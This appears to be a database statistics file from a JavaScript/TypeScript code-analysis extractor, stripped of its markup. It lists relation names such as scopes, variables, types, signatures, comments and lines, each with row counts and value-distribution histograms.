+scopenesting +118171 + + +inner +118171 + + +outer +33143 + + + + +inner +outer + + +12 + + +1 +2 +118171 + + + + + + +outer +inner + + +12 + + +1 +2 +17868 
+ + +2 +3 +6196 + + +3 +4 +2666 + + +4 +6 +2791 + + +6 +13 +2584 + + +13 +17277 +1038 + + + + + + + + +is_generator +62 + + +fun +62 + + + + + +has_rest_parameter +33 + + +fun +33 + + + + + +is_async +50 + + +fun +50 + + + + + +variables +id +364388 + + +id +364388 + + +name +56559 + + +scope +118168 + + + + +id +name + + +12 + + +1 +2 +364388 + + + + + + +id +scope + + +12 + + +1 +2 +364388 + + + + + + +name +id + + +12 + + +1 +2 +38013 + + +2 +3 +9547 + + +3 +5 +4518 + + +5 +115 +4242 + + +115 +116259 +239 + + + + + + +name +scope + + +12 + + +1 +2 +38013 + + +2 +3 +9547 + + +3 +5 +4518 + + +5 +115 +4242 + + +115 +116259 +239 + + + + + + +scope +id + + +12 + + +1 +2 +39907 + + +2 +3 +32053 + + +3 +4 +18882 + + +4 +5 +9814 + + +5 +8 +10909 + + +8 +8779 +6603 + + + + + + +scope +name + + +12 + + +1 +2 +39907 + + +2 +3 +32053 + + +3 +4 +18882 + + +4 +5 +9814 + + +5 +8 +10909 + + +8 +8779 +6603 + + + + + + + + +local_type_names +23565 + + +id +23565 + + +name +6080 + + +scope +1614 + + + + +id +name + + +12 + + +1 +2 +23565 + + + + + + +id +scope + + +12 + + +1 +2 +23565 + + + + + + +name +id + + +12 + + +1 +2 +2821 + + +2 +3 +1362 + + +3 +4 +641 + + +4 +6 +508 + + +6 +13 +485 + + +13 +533 +263 + + + + + + +name +scope + + +12 + + +1 +2 +2821 + + +2 +3 +1362 + + +3 +4 +641 + + +4 +6 +508 + + +6 +13 +485 + + +13 +533 +263 + + + + + + +scope +id + + +12 + + +1 +2 +138 + + +2 +3 +109 + + +3 +4 +116 + + +4 +5 +108 + + +5 +7 +140 + + +7 +8 +89 + + +8 +10 +131 + + +10 +12 +112 + + +12 +15 +144 + + +15 +19 +134 + + +19 +25 +132 + + +25 +37 +122 + + +37 +87 +122 + + +87 +221 +17 + + + + + + +scope +name + + +12 + + +1 +2 +138 + + +2 +3 +109 + + +3 +4 +116 + + +4 +5 +108 + + +5 +7 +140 + + +7 +8 +89 + + +8 +10 +131 + + +10 +12 +112 + + +12 +15 +144 + + +15 +19 +134 + + +19 +25 +132 + + +25 +37 +122 + + +37 +87 +122 + + +87 +221 +17 + + + + + + + + +local_namespace_names +20832 + + +id +20832 + + +name +4078 + + +scope +1543 + + + + +id +name + + +12 + + +1 +2 +20832 + + + + + 
+ +id +scope + + +12 + + +1 +2 +20832 + + + + + + +name +id + + +12 + + +1 +2 +1787 + + +2 +3 +859 + + +3 +4 +378 + + +4 +5 +216 + + +5 +8 +364 + + +8 +20 +310 + + +20 +533 +164 + + + + + + +name +scope + + +12 + + +1 +2 +1787 + + +2 +3 +859 + + +3 +4 +378 + + +4 +5 +216 + + +5 +8 +364 + + +8 +20 +310 + + +20 +533 +164 + + + + + + +scope +id + + +12 + + +1 +2 +88 + + +2 +3 +123 + + +3 +4 +120 + + +4 +5 +104 + + +5 +6 +107 + + +6 +7 +70 + + +7 +8 +87 + + +8 +10 +137 + + +10 +12 +122 + + +12 +15 +122 + + +15 +19 +124 + + +19 +26 +120 + + +26 +39 +117 + + +39 +136 +102 + + + + + + +scope +name + + +12 + + +1 +2 +88 + + +2 +3 +123 + + +3 +4 +120 + + +4 +5 +104 + + +5 +6 +107 + + +6 +7 +70 + + +7 +8 +87 + + +8 +10 +137 + + +10 +12 +122 + + +12 +15 +122 + + +15 +19 +124 + + +19 +26 +120 + + +26 +39 +117 + + +39 +136 +102 + + + + + + + + +is_arguments_object +116243 + + +id +116243 + + + + + +bind +1295408 + + +id +1295408 + + +decl +224900 + + + + +id +decl + + +12 + + +1 +2 +1295408 + + + + + + +decl +id + + +12 + + +1 +2 +81789 + + +2 +3 +50824 + + +3 +4 +29919 + + +4 +5 +17755 + + +5 +7 +16901 + + +7 +14 +17790 + + +14 +98305 +9922 + + + + + + + + +decl +250257 + + +id +250257 + + +decl +246998 + + + + +id +decl + + +12 + + +1 +2 +250257 + + + + + + +decl +id + + +12 + + +1 +2 +245772 + + +2 +283 +1226 + + + + + + + + +typebind +36216 + + +id +36216 + + +decl +12650 + + + + +id +decl + + +12 + + +1 +2 +36216 + + + + + + +decl +id + + +12 + + +1 +2 +6781 + + +2 +3 +2435 + + +3 +4 +1133 + + +4 +6 +1127 + + +6 +17 +954 + + +17 +524 +220 + + + + + + + + +typedecl +23573 + + +id +23573 + + +decl +23565 + + + + +id +decl + + +12 + + +1 +2 +23573 + + + + + + +decl +id + + +12 + + +1 +2 +23558 + + +2 +4 +7 + + + + + + + + +namespacedecl +20839 + + +id +20839 + + +decl +20832 + + + + +id +decl + + +12 + + +1 +2 +20839 + + + + + + +decl +id + + +12 + + +1 +2 +20828 + + +2 +5 +4 + + + + + + + + +namespacebind +4300 + + +id +4300 + + +decl +485 + + + + +id +decl + + +12 + + +1 +2 
+4300 + + + + + + +decl +id + + +12 + + +1 +2 +133 + + +2 +3 +46 + + +3 +4 +56 + + +4 +5 +30 + + +5 +7 +37 + + +7 +9 +44 + + +9 +12 +41 + + +12 +17 +38 + + +17 +31 +37 + + +32 +287 +23 + + + + + + + + +properties +id +142723 + + +id +142723 + + +parent +45129 + + +index +4204 + + +kind +3 + + +tostring +67703 + + + + +id +parent + + +12 + + +1 +2 +142723 + + + + + + +id +index + + +12 + + +1 +2 +142723 + + + + + + +id +kind + + +12 + + +1 +2 +142723 + + + + + + +id +tostring + + +12 + + +1 +2 +142723 + + + + + + +parent +id + + +12 + + +1 +2 +15702 + + +2 +3 +17715 + + +3 +4 +4729 + + +4 +6 +3778 + + +6 +4205 +3205 + + + + + + +parent +index + + +12 + + +1 +2 +15702 + + +2 +3 +17715 + + +3 +4 +4729 + + +4 +6 +3778 + + +6 +4205 +3205 + + + + + + +parent +kind + + +12 + + +1 +2 +44603 + + +2 +4 +526 + + + + + + +parent +tostring + + +12 + + +1 +2 +15770 + + +2 +3 +17763 + + +3 +4 +4692 + + +4 +6 +3759 + + +6 +4173 +3145 + + + + + + +index +id + + +12 + + +2 +3 +2827 + + +3 +4 +364 + + +4 +6 +358 + + +6 +8 +337 + + +8 +11713 +316 + + +29427 +45130 +2 + + + + + + +index +parent + + +12 + + +2 +3 +2827 + + +3 +4 +364 + + +4 +6 +358 + + +6 +8 +337 + + +8 +11713 +316 + + +29427 +45130 +2 + + + + + + +index +kind + + +12 + + +1 +2 +4149 + + +2 +4 +55 + + + + + + +index +tostring + + +12 + + +1 +2 +2827 + + +2 +3 +364 + + +3 +5 +358 + + +5 +7 +337 + + +7 +6233 +316 + + +16744 +16747 +2 + + + + + + +kind +id + + +12 + + +338 +339 +1 + + +1529 +1530 +1 + + +140856 +140857 +1 + + + + + + +kind +parent + + +12 + + +204 +205 +1 + + +523 +524 +1 + + +45034 +45035 +1 + + + + + + +kind +index + + +12 + + +36 +37 +1 + + +55 +56 +1 + + +4204 +4205 +1 + + + + + + +kind +tostring + + +12 + + +174 +175 +1 + + +880 +881 +1 + + +66649 +66650 +1 + + + + + + +tostring +id + + +12 + + +1 +2 +46301 + + +2 +3 +13295 + + +3 +6 +5112 + + +6 +2975 +2995 + + + + + + +tostring +parent + + +12 + + +1 +2 +46926 + + +2 +3 +13013 + + +3 +7 +5466 + + +7 +2975 +2298 + + + + + + +tostring +index + + +12 + 
+ +1 +2 +61480 + + +2 +4 +5275 + + +4 +43 +948 + + + + + + +tostring +kind + + +12 + + +1 +2 +67703 + + + + + + + + +is_computed +27 + + +id +27 + + + + + +is_method +392 + + +id +392 + + + + + +is_static +36 + + +id +36 + + + + + +type_alias +1386 + + +aliasType +1386 + + +underlyingType +1361 + + + + +underlyingType +aliasType + + +12 + + +1 +2 +1 + + + + + + +aliasType +underlyingType + + +12 + + +1 +2 +1 + + + + + + + + +type_literal_value +31882 + + +typ +31882 + + +value +31828 + + + + +typ +value + + +12 + + +1 +2 +31882 + + + + + + +value +typ + + +12 + + +1 +2 +31774 + + +2 +3 +54 + + + + + + + + +signature_types +46921 + + +id +46921 + + +kind +2 + + +tostring +27460 + + +type_parameters +11 + + +required_params +22 + + + + +id +kind + + +12 + + +1 +2 +46921 + + + + + + +id +tostring + + +12 + + +1 +2 +46921 + + + + + + +id +type_parameters + + +12 + + +1 +2 +46921 + + + + + + +id +required_params + + +12 + + +1 +2 +46921 + + + + + + +kind +id + + +12 + + +2639 +2640 +1 + + +44282 +44283 +1 + + + + + + +kind +tostring + + +12 + + +2200 +2201 +1 + + +25260 +25261 +1 + + + + + + +kind +type_parameters + + +12 + + +4 +5 +1 + + +11 +12 +1 + + + + + + +kind +required_params + + +12 + + +18 +19 +1 + + +19 +20 +1 + + + + + + +tostring +id + + +12 + + +1 +2 +22069 + + +2 +3 +3061 + + +3 +13 +2112 + + +13 +277 +218 + + + + + + +tostring +kind + + +12 + + +1 +2 +27460 + + + + + + +tostring +type_parameters + + +12 + + +1 +2 +27459 + + +2 +3 +1 + + + + + + +tostring +required_params + + +12 + + +1 +2 +27134 + + +2 +10 +326 + + + + + + +type_parameters +id + + +12 + + +1 +2 +1 + + +13 +14 +1 + + +25 +26 +1 + + +34 +35 +1 + + +42 +43 +1 + + +51 +52 +1 + + +74 +75 +1 + + +139 +140 +1 + + +274 +275 +1 + + +5367 +5368 +1 + + +40901 +40902 +1 + + + + + + +type_parameters +kind + + +12 + + +1 +2 +7 + + +2 +3 +4 + + + + + + +type_parameters +tostring + + +12 + + +1 +2 +1 + + +5 +6 +1 + + +6 +7 +2 + + +8 +9 +2 + + +17 +18 +1 + + +18 +19 +1 + + +158 +159 +1 + + +1805 +1806 +1 
+ + +25429 +25430 +1 + + + + + + +type_parameters +required_params + + +12 + + +1 +2 +1 + + +3 +4 +1 + + +4 +5 +1 + + +5 +6 +1 + + +6 +7 +2 + + +7 +8 +1 + + +8 +9 +2 + + +9 +10 +1 + + +22 +23 +1 + + + + + + +required_params +id + + +12 + + +1 +2 +4 + + +2 +3 +2 + + +3 +5 +2 + + +5 +11 +2 + + +11 +12 +2 + + +44 +131 +2 + + +197 +373 +2 + + +645 +2439 +2 + + +2783 +6853 +2 + + +16407 +17002 +2 + + + + + + +required_params +kind + + +12 + + +1 +2 +7 + + +2 +3 +15 + + + + + + +required_params +tostring + + +12 + + +1 +2 +4 + + +2 +3 +3 + + +4 +5 +1 + + +5 +6 +2 + + +9 +12 +2 + + +39 +62 +2 + + +112 +205 +2 + + +432 +1404 +2 + + +1813 +3662 +2 + + +8431 +11659 +2 + + + + + + +required_params +type_parameters + + +12 + + +1 +2 +12 + + +2 +3 +1 + + +3 +4 +2 + + +5 +7 +2 + + +8 +10 +2 + + +10 +11 +2 + + +11 +12 +1 + + + + + + + + +is_abstract_signature +12 + + +sig +12 + + + + + +signature_rest_parameter +19521 + + +sig +19521 + + +rest_param_arra_type +14259 + + + + +rest_param_arra_type +sig + + +12 + + +1 +2 +1 + + + + + + +sig +rest_param_arra_type + + +12 + + +1 +2 +1 + + + + + + + + +type_contains_signature +87640 + + +typ +68964 + + +kind +2 + + +index +247 + + +sig +37344 + + + + +typ +kind + + +12 + + +1 +2 +68938 + + +2 +3 +26 + + + + + + +typ +index + + +12 + + +1 +2 +59150 + + +2 +3 +5394 + + +3 +248 +4420 + + + + + + +typ +sig + + +12 + + +1 +2 +60034 + + +2 +3 +4557 + + +3 +248 +4373 + + + + + + +kind +typ + + +12 + + +2582 +2583 +1 + + +66408 +66409 +1 + + + + + + +kind +index + + +12 + + +6 +7 +1 + + +247 +248 +1 + + + + + + +kind +sig + + +12 + + +2646 +2647 +1 + + +34698 +34699 +1 + + + + + + +index +typ + + +12 + + +1 +2 +198 + + +2 +3 +21 + + +3 +265 +19 + + +449 +42171 +9 + + + + + + +index +kind + + +12 + + +1 +2 +241 + + +2 +3 +6 + + + + + + +index +sig + + +12 + + +1 +2 +198 + + +2 +3 +24 + + +3 +90 +19 + + +309 +31688 +6 + + + + + + +sig +typ + + +12 + + +1 +2 +35114 + + +2 +896 +2230 + + + + + + +sig +kind + + +12 + + +1 +2 +37344 + + + + + + +sig 
+index + + +12 + + +1 +2 +36489 + + +2 +9 +855 + + + + + + + + +signature_contains_type +107012 + + +child +26824 + + +parent +37344 + + +index +21 + + + + +child +parent + + +12 + + +1 +2 +19848 + + +2 +3 +3736 + + +3 +7 +2017 + + +7 +10275 +1223 + + + + + + +child +index + + +12 + + +1 +2 +22572 + + +2 +3 +3289 + + +3 +22 +963 + + + + + + +parent +child + + +12 + + +1 +2 +3594 + + +2 +3 +18463 + + +3 +4 +10057 + + +4 +5 +3906 + + +5 +11 +1324 + + + + + + +parent +index + + +12 + + +1 +2 +2649 + + +2 +3 +14810 + + +3 +4 +12007 + + +4 +5 +4294 + + +5 +8 +3055 + + +8 +22 +529 + + + + + + +index +child + + +12 + + +1 +2 +2 + + +2 +3 +6 + + +3 +4 +1 + + +5 +6 +1 + + +9 +10 +1 + + +18 +19 +1 + + +106 +107 +1 + + +313 +314 +1 + + +455 +456 +1 + + +643 +644 +1 + + +1088 +1089 +1 + + +2051 +2052 +1 + + +6862 +6863 +1 + + +8789 +8790 +1 + + +12289 +12290 +1 + + + + + + +index +parent + + +12 + + +2 +3 +1 + + +3 +4 +1 + + +4 +5 +2 + + +5 +6 +1 + + +6 +7 +1 + + +17 +18 +1 + + +22 +23 +1 + + +26 +27 +1 + + +37 +38 +1 + + +45 +46 +1 + + +91 +92 +1 + + +219 +220 +1 + + +529 +530 +1 + + +1042 +1043 +1 + + +1574 +1575 +1 + + +3584 +3585 +1 + + +7878 +7879 +1 + + +19885 +19886 +1 + + +34695 +34696 +1 + + +37344 +37345 +1 + + + + + + + + +signature_parameter_name +69668 + + +sig +34695 + + +index +20 + + +name +4071 + + + + +sig +index + + +12 + + +1 +2 +14810 + + +2 +3 +12007 + + +3 +4 +4294 + + +4 +7 +3055 + + +7 +21 +529 + + + + + + +sig +name + + +12 + + +1 +2 +14810 + + +2 +3 +12007 + + +3 +4 +4294 + + +4 +7 +3055 + + +7 +21 +529 + + + + + + +index +sig + + +12 + + +2 +3 +1 + + +3 +4 +1 + + +4 +5 +2 + + +5 +6 +1 + + +6 +7 +1 + + +17 +18 +1 + + +22 +23 +1 + + +26 +27 +1 + + +37 +38 +1 + + +45 +46 +1 + + +91 +92 +1 + + +219 +220 +1 + + +529 +530 +1 + + +1042 +1043 +1 + + +1574 +1575 +1 + + +3584 +3585 +1 + + +7878 +7879 +1 + + +19885 +19886 +1 + + +34695 +34696 +1 + + + + + + +index +name + + +12 + + +2 +3 +1 + + +3 +4 +1 + + +4 +5 +2 + + +5 +6 +2 + + +11 +12 +1 + + +16 +17 +1 + 
+ +18 +19 +1 + + +24 +25 +1 + + +30 +31 +1 + + +45 +46 +1 + + +63 +64 +1 + + +116 +117 +1 + + +188 +189 +1 + + +344 +345 +1 + + +605 +606 +1 + + +1092 +1093 +1 + + +1741 +1742 +1 + + +2122 +2123 +1 + + + + + + +name +sig + + +12 + + +1 +2 +1898 + + +2 +3 +700 + + +3 +4 +294 + + +4 +5 +262 + + +5 +8 +310 + + +8 +24 +309 + + +24 +3588 +298 + + + + + + +name +index + + +12 + + +1 +2 +2804 + + +2 +3 +738 + + +3 +4 +290 + + +4 +15 +239 + + + + + + + + +number_index_type +2038 + + +baseType +2038 + + +propertyType +517 + + + + +baseType +propertyType + + +12 + + +1 +2 +2038 + + + + + + +propertyType +baseType + + +12 + + +1 +2 +435 + + +2 +3 +70 + + +3 +1259 +12 + + + + + + + + +string_index_type +1102 + + +baseType +1102 + + +propertyType +256 + + + + +baseType +propertyType + + +12 + + +1 +2 +1102 + + + + + + +propertyType +baseType + + +12 + + +1 +2 +219 + + +2 +3 +20 + + +3 +436 +17 + + + + + + + + +base_type_names +941 + + +typeName +928 + + +baseTypeName +369 + + + + +typeName +baseTypeName + + +12 + + +1 +2 +917 + + +2 +4 +11 + + + + + + +baseTypeName +typeName + + +12 + + +1 +2 +175 + + +2 +3 +101 + + +3 +4 +29 + + +4 +5 +29 + + +5 +11 +28 + + +15 +41 +7 + + + + + + + + +self_types +19632 + + +typeName +14119 + + +selfType +19632 + + + + +typeName +selfType + + +12 + + +1 +2 +10451 + + +2 +3 +1823 + + +3 +4 +1845 + + + + + + +selfType +typeName + + +12 + + +1 +2 +19632 + + + + + + + + +tuple_type_min_length +241 + + +typ +241 + + +minLength +10 + + + + +typ +minLength + + +12 + + +1 +2 +241 + + + + + + +minLength +typ + + +12 + + +2 +3 +3 + + +3 +4 +1 + + +4 +5 +1 + + +7 +8 +1 + + +20 +21 +1 + + +42 +43 +1 + + +66 +67 +1 + + +93 +94 +1 + + + + + + + + +tuple_type_rest_index +6 + + +typ +6 + + +index +2 + + + + +typ +index + + +12 + + +1 +2 +6 + + + + + + +index +typ + + +12 + + +1 +2 +1 + + +5 +6 +1 + + + + + + + + +comments +id +104947 + + +id +104947 + + +kind +5 + + +toplevel +4497 + + +text +73454 + + +tostring +57955 + + + + +id +kind + + +12 + + +1 +2 
+104947 + + + + + + +id +toplevel + + +12 + + +1 +2 +104947 + + + + + + +id +text + + +12 + + +1 +2 +104947 + + + + + + +id +tostring + + +12 + + +1 +2 +104947 + + + + + + +kind +id + + +12 + + +1 +2 +2 + + +8834 +8835 +1 + + +19270 +19271 +1 + + +76841 +76842 +1 + + + + + + +kind +toplevel + + +12 + + +1 +2 +2 + + +1705 +1706 +1 + + +3107 +3108 +1 + + +3141 +3142 +1 + + + + + + +kind +text + + +12 + + +1 +2 +2 + + +4893 +4894 +1 + + +12759 +12760 +1 + + +55810 +55811 +1 + + + + + + +kind +tostring + + +12 + + +1 +2 +2 + + +1739 +1740 +1 + + +2536 +2537 +1 + + +53678 +53679 +1 + + + + + + +toplevel +id + + +12 + + +1 +2 +1034 + + +2 +3 +512 + + +3 +4 +332 + + +4 +5 +260 + + +5 +7 +388 + + +7 +10 +401 + + +10 +14 +354 + + +14 +21 +365 + + +21 +36 +338 + + +36 +99 +339 + + +99 +6350 +174 + + + + + + +toplevel +kind + + +12 + + +1 +2 +1856 + + +2 +3 +1824 + + +3 +4 +817 + + + + + + +toplevel +text + + +12 + + +1 +2 +1043 + + +2 +3 +533 + + +3 +4 +341 + + +4 +5 +266 + + +5 +7 +396 + + +7 +9 +315 + + +9 +13 +388 + + +13 +20 +385 + + +20 +35 +344 + + +35 +103 +344 + + +103 +4413 +142 + + + + + + +toplevel +tostring + + +12 + + +1 +2 +1054 + + +2 +3 +571 + + +3 +4 +374 + + +4 +5 +297 + + +5 +6 +232 + + +6 +8 +363 + + +8 +11 +345 + + +11 +16 +366 + + +16 +27 +352 + + +27 +60 +338 + + +60 +4394 +205 + + + + + + +text +id + + +12 + + +1 +2 +59626 + + +2 +3 +10314 + + +3 +1417 +3514 + + + + + + +text +kind + + +12 + + +1 +2 +73446 + + +2 +5 +8 + + + + + + +text +toplevel + + +12 + + +1 +2 +62696 + + +2 +3 +8455 + + +3 +257 +2303 + + + + + + +text +tostring + + +12 + + +1 +2 +73446 + + +2 +5 +8 + + + + + + +tostring +id + + +12 + + +1 +2 +44781 + + +2 +3 +9203 + + +3 +4589 +3971 + + + + + + +tostring +kind + + +12 + + +1 +2 +57955 + + + + + + +tostring +toplevel + + +12 + + +1 +2 +48252 + + +2 +3 +7233 + + +3 +513 +2470 + + + + + + +tostring +text + + +12 + + +1 +2 +55262 + + +2 +3403 +2693 + + + + + + + + +types +179398 + + +id +179398 + + +kind +9 + + +tostring +40918 + + + 
+ +id +kind + + +12 + + +1 +2 +179398 + + + + + + +id +tostring + + +12 + + +1 +2 +179398 + + + + + + +kind +id + + +12 + + +1 +2 +5 + + +1802 +1803 +1 + + +6109 +6110 +1 + + +12383 +12384 +1 + + +159099 +159100 +1 + + + + + + +kind +tostring + + +12 + + +1 +2 +5 + + +50 +51 +1 + + +745 +746 +1 + + +7464 +7465 +1 + + +32936 +32937 +1 + + + + + + +tostring +id + + +12 + + +1 +2 +22482 + + +2 +3 +8025 + + +3 +4 +3362 + + +4 +7 +3387 + + +7 +33 +3070 + + +33 +7284 +592 + + + + + + +tostring +kind + + +12 + + +1 +2 +40638 + + +2 +4 +280 + + + + + + + + +type_child +17410 + + +child +9118 + + +parent +7772 + + +idx +296 + + + + +child +parent + + +12 + + +1 +2 +7113 + + +2 +3 +978 + + +3 +8 +686 + + +8 +199 +341 + + + + + + +child +idx + + +12 + + +1 +2 +8255 + + +2 +5 +726 + + +5 +19 +137 + + + + + + +parent +child + + +12 + + +1 +2 +5433 + + +2 +3 +1746 + + +3 +288 +583 + + +288 +297 +10 + + + + + + +parent +idx + + +12 + + +1 +2 +5422 + + +2 +3 +1757 + + +3 +288 +583 + + +288 +297 +10 + + + + + + +idx +child + + +12 + + +1 +2 +1 + + +2 +3 +39 + + +3 +4 +3 + + +4 +5 +61 + + +5 +6 +37 + + +6 +7 +56 + + +7 +12 +22 + + +12 +14 +18 + + +14 +15 +44 + + +17 +6068 +15 + + + + + + +idx +parent + + +12 + + +2 +15 +13 + + +15 +16 +90 + + +19 +20 +81 + + +20 +23 +3 + + +23 +24 +75 + + +24 +55 +23 + + +55 +7773 +11 + + + + + + + + +ast_node_type +1261889 + + +node +1261889 + + +typ +72602 + + + + +node +typ + + +12 + + +1 +2 +1261889 + + + + + + +typ +node + + +12 + + +1 +2 +39248 + + +2 +3 +8371 + + +3 +4 +7888 + + +4 +5 +3053 + + +5 +8 +6417 + + +8 +28 +5528 + + +28 +588233 +2097 + + + + + + + + +declared_function_signature +62664 + + +node +62664 + + +sig +21731 + + + + +node +sig + + +12 + + +1 +2 +62664 + + + + + + +sig +node + + +12 + + +1 +2 +16826 + + +2 +3 +2358 + + +3 +6 +1683 + + +6 +10251 +864 + + + + + + + + +invoke_expr_signature +140668 + + +node +140668 + + +sig +9111 + + + + +node +sig + + +12 + + +1 +2 +140668 + + + + + + +sig +node + + +12 + + +1 +2 +4612 + + 
+2 +3 +1819 + + +3 +4 +737 + + +4 +6 +696 + + +6 +14 +705 + + +14 +68351 +542 + + + + + + + + +invoke_expr_overload_index +73550 + + +node +73550 + + +index +47 + + + + +node +index + + +12 + + +1 +2 +73550 + + + + + + +index +node + + +12 + + +1 +2 +17 + + +2 +3 +7 + + +3 +5 +4 + + +5 +6 +4 + + +6 +8 +3 + + +8 +16 +4 + + +27 +155 +4 + + +211 +68535 +4 + + + + + + + + +symbols +10192 + + +id +10192 + + +kind +3 + + +name +7872 + + + + +id +kind + + +12 + + +1 +2 +10192 + + + + + + +id +name + + +12 + + +1 +2 +10192 + + + + + + +kind +id + + +12 + + +584 +585 +1 + + +2385 +2386 +1 + + +7223 +7224 +1 + + + + + + +kind +name + + +12 + + +30 +31 +1 + + +2385 +2386 +1 + + +5609 +5610 +1 + + + + + + +name +id + + +12 + + +1 +2 +6929 + + +2 +3 +533 + + +3 +273 +410 + + + + + + +name +kind + + +12 + + +1 +2 +7730 + + +2 +4 +142 + + + + + + + + +symbol_parent +7807 + + +symbol +7807 + + +parent +1727 + + + + +symbol +parent + + +12 + + +1 +2 +7807 + + + + + + +parent +symbol + + +12 + + +1 +2 +778 + + +2 +3 +304 + + +3 +4 +212 + + +4 +5 +111 + + +5 +8 +152 + + +8 +26 +136 + + +26 +297 +34 + + + + + + + + +symbol_module +100 + + +symbol +97 + + +moduleName +98 + + + + +symbol +moduleName + + +12 + + +1 +2 +95 + + +2 +4 +2 + + + + + + +moduleName +symbol + + +12 + + +1 +2 +96 + + +2 +3 +2 + + + + + + + + +symbol_global +354 + + +symbol +354 + + +globalName +350 + + + + +symbol +globalName + + +12 + + +1 +2 +354 + + + + + + +globalName +symbol + + +12 + + +1 +2 +347 + + +2 +4 +3 + + + + + + + + +ast_node_symbol +8173 + + +node +8173 + + +symbol +8155 + + + + +node +symbol + + +12 + + +1 +2 +8173 + + + + + + +symbol +node + + +12 + + +1 +2 +8147 + + +2 +12 +8 + + + + + + + + +type_symbol +12383 + + +typ +12383 + + +symbol +6743 + + + + +typ +symbol + + +12 + + +1 +2 +12383 + + + + + + +symbol +typ + + +12 + + +1 +2 +6240 + + +2 +3070 +503 + + + + + + + + +type_property +331170 + + +typ +49305 + + +name +22420 + + +propertyType +130857 + + + + +typ +name + + +12 + + +1 +2 +10275 
+ + +2 +3 +14770 + + +3 +4 +6020 + + +4 +5 +3153 + + +5 +6 +1700 + + +6 +7 +4257 + + +7 +19 +3783 + + +19 +23 +3833 + + +23 +1390 +1514 + + + + + + +typ +propertyType + + +12 + + +1 +2 +19351 + + +2 +3 +10786 + + +3 +4 +5073 + + +4 +6 +2639 + + +6 +7 +3864 + + +7 +22 +3334 + + +22 +33 +3710 + + +33 +1390 +548 + + + + + + +name +typ + + +12 + + +1 +2 +4735 + + +2 +3 +7379 + + +3 +4 +2728 + + +4 +5 +1467 + + +5 +7 +1481 + + +7 +11 +1878 + + +11 +30 +1682 + + +30 +7825 +1070 + + + + + + +name +propertyType + + +12 + + +1 +2 +14690 + + +2 +3 +2698 + + +3 +4 +1925 + + +4 +8 +1697 + + +8 +3373 +1410 + + + + + + +propertyType +typ + + +12 + + +1 +2 +112801 + + +2 +3 +12999 + + +3 +19440 +5057 + + + + + + +propertyType +name + + +12 + + +1 +2 +129508 + + +2 +3475 +1349 + + + + + + + + +lines +id +1622184 + + +id +1622184 + + +toplevel +5312 + + +text +648122 + + +terminator +6 + + + + +id +toplevel + + +12 + + +1 +2 +1622184 + + + + + + +id +text + + +12 + + +1 +2 +1622184 + + + + + + +id +terminator + + +12 + + +1 +2 +1622184 + + + + + + +toplevel +id + + +12 + + +1 +12 +425 + + +12 +24 +415 + + +24 +37 +419 + + +37 +50 +404 + + +50 +66 +411 + + +66 +85 +400 + + +85 +108 +405 + + +108 +138 +402 + + +138 +174 +402 + + +174 +232 +405 + + +232 +331 +399 + + +331 +547 +399 + + +548 +4700 +399 + + +4783 +277404 +27 + + + + + + +toplevel +text + + +12 + + +1 +11 +441 + + +11 +21 +427 + + +21 +30 +414 + + +30 +40 +452 + + +40 +51 +435 + + +51 +64 +413 + + +64 +79 +404 + + +79 +96 +401 + + +96 +121 +400 + + +121 +158 +401 + + +158 +220 +399 + + +220 +387 +401 + + +388 +60934 +324 + + + + + + +toplevel +terminator + + +12 + + +1 +2 +5046 + + +2 +6 +266 + + + + + + +text +id + + +12 + + +1 +2 +513961 + + +2 +3 +84265 + + +3 +49 +48993 + + +49 +175121 +903 + + + + + + +text +toplevel + + +12 + + +1 +2 +569267 + + +2 +3 +56143 + + +3 +5068 +22712 + + + + + + +text +terminator + + +12 + + +1 +2 +647931 + + +2 +4 +191 + + + + + + +terminator +id + + +12 + + +3 +4 +3 + + +349 +350 +1 + 
+ +1830 +1831 +1 + + +1619996 +1619997 +1 + + + + + + +terminator +toplevel + + +12 + + +3 +4 +3 + + +11 +12 +1 + + +349 +350 +1 + + +5218 +5219 +1 + + + + + + +terminator +text + + +12 + + +1 +2 +3 + + +110 +111 +1 + + +1093 +1094 +1 + + +647111 +647112 +1 + + + + + + + + +indentation +1145010 + + +file +5728 + + +lineno +40788 + + +indentChar +2 + + +indentDepth +72 + + + + +file +lineno + + +12 + + +1 +9 +440 + + +9 +18 +471 + + +18 +29 +439 + + +29 +41 +451 + + +41 +54 +460 + + +54 +71 +442 + + +71 +91 +441 + + +91 +118 +430 + + +118 +152 +432 + + +152 +205 +434 + + +205 +295 +431 + + +295 +503 +430 + + +503 +38151 +427 + + + + + + +file +indentChar + + +12 + + +1 +2 +5692 + + +2 +3 +36 + + + + + + +file +indentDepth + + +12 + + +1 +2 +287 + + +2 +3 +401 + + +3 +4 +665 + + +4 +5 +815 + + +5 +6 +814 + + +6 +7 +687 + + +7 +8 +567 + + +8 +9 +390 + + +9 +11 +503 + + +11 +17 +462 + + +17 +67 +137 + + + + + + +lineno +file + + +12 + + +1 +2 +10935 + + +2 +3 +5303 + + +3 +4 +12061 + + +4 +6 +3644 + + +6 +13 +3223 + + +13 +31 +3090 + + +31 +3986 +2532 + + + + + + +lineno +indentChar + + +12 + + +1 +2 +38720 + + +2 +3 +2068 + + + + + + +lineno +indentDepth + + +12 + + +1 +2 +11626 + + +2 +3 +7847 + + +3 +4 +10434 + + +4 +5 +2688 + + +5 +8 +3316 + + +8 +13 +3144 + + +13 +39 +1733 + + + + + + +indentChar +file + + +12 + + +42 +43 +1 + + +5722 +5723 +1 + + + + + + +indentChar +lineno + + +12 + + +2068 +2069 +1 + + +40788 +40789 +1 + + + + + + +indentChar +indentDepth + + +12 + + +10 +11 +1 + + +72 +73 +1 + + + + + + +indentDepth +file + + +12 + + +1 +6 +6 + + +6 +9 +6 + + +9 +20 +6 + + +21 +30 +6 + + +38 +57 +6 + + +59 +90 +6 + + +90 +124 +6 + + +132 +160 +6 + + +165 +211 +6 + + +213 +337 +6 + + +377 +1532 +6 + + +1919 +5487 +6 + + + + + + +indentDepth +lineno + + +12 + + +2 +8 +6 + + +11 +19 +6 + + +25 +44 +6 + + +53 +67 +6 + + +67 +89 +6 + + +102 +169 +6 + + +183 +239 +6 + + +269 +411 +6 + + +417 +971 +6 + + +1129 +2732 +6 + + +4374 +9301 +6 + + +11828 +21226 +6 + + + + 
